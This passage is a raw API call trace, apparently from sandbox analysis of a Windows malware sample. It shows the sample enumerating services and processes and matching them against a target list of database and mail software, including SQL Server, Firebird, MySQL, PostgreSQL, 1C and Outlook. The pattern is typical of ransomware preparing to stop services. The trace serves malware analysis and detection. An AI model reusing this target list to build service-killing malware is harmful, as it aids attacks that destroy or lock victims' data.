pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0042.927] GetLastError () returned 0xea [0042.927] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x123e) returned 0x39606f0 [0042.927] EnumServicesStatusExW (in: hSCManager=0x5f0070, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39606f0, cbBufSize=0x123e, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39606f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0042.928] CloseServiceHandle (hSCObject=0x5f0070) returned 1 [0042.928] lstrlenW (lpString="Appinfo") returned 7 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.928] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrlenW (lpString="AudioSrv") returned 8 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0042.928] lstrlenW (lpString="BFE") returned 3 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.928] lstrlenW (lpString="CryptSvc") returned 8 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.929] lstrlenW (lpString="CscService") returned 10 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0042.929] lstrlenW (lpString="DcomLaunch") returned 10 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.929] lstrlenW (lpString="Dhcp") returned 4 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.929] lstrlenW (lpString="Dnscache") returned 8 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.929] lstrlenW (lpString="DPS") returned 3 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.929] lstrlenW (lpString="eventlog") returned 8 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0042.930] lstrlenW (lpString="EventSystem") returned 11 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.930] lstrlenW (lpString="gpsvc") returned 5 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.930] lstrlenW (lpString="iphlpsvc") returned 8 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.930] lstrlenW (lpString="LanmanServer") returned 12 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.930] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.931] lstrlenW (lpString="lmhosts") returned 7 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.931] lstrlenW (lpString="MMCSS") returned 5 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0042.931] lstrlenW (lpString="MpsSvc") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.931] lstrlenW (lpString="Netman") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0042.931] lstrlenW (lpString="netprofm") returned 8 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.931] lstrlenW (lpString="NlaSvc") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.932] lstrlenW (lpString="nsi") returned 3 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.932] lstrlenW (lpString="PcaSvc") returned 6 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.932] lstrlenW (lpString="PlugPlay") returned 8 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.932] lstrlenW (lpString="Power") returned 5 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.932] lstrlenW (lpString="ProfSvc") returned 7 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.932] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.933] lstrlenW (lpString="RpcSs") returned 5 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.933] lstrlenW (lpString="SamSs") returned 5 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.933] lstrlenW (lpString="Schedule") returned 8 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.933] lstrlenW (lpString="SENS") returned 4 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.933] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.934] lstrlenW (lpString="Spooler") returned 7 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.934] lstrlenW (lpString="SysMain") returned 7 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0042.934] lstrlenW (lpString="Themes") returned 6 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0042.934] lstrlenW (lpString="TrkWks") returned 6 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0042.934] lstrlenW (lpString="UxSms") returned 5 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0042.934] lstrlenW (lpString="VSS") returned 3 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0042.935] lstrlenW (lpString="WdiServiceHost") returned 14 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0042.935] lstrlenW (lpString="WdiSystemHost") returned 13 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0042.935] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrlenW (lpString="Winmgmt") returned 7 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0042.935] lstrlenW (lpString="WPDBusEnum") returned 10 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0042.935] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39606f0 | out: hHeap=0x570000) returned 1 [0042.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0042.938] Process32FirstW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0042.938] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0042.939] lstrlenW (lpString="System") returned 6 [0042.939] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0042.939] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0042.939] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0042.940] lstrlenW (lpString="smss.exe") returned 8 [0042.940] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0042.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0042.940] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.941] lstrlenW (lpString="csrss.exe") returned 9 [0042.941] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0042.941] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0042.941] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0042.941] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0042.941] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0042.941] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0042.942] lstrlenW (lpString="wininit.exe") returned 11 [0042.942] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0042.942] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0042.942] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.943] lstrlenW (lpString="csrss.exe") returned 9 [0042.943] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.943] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0042.943] lstrlenW (lpString="winlogon.exe") returned 12 [0042.944] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, 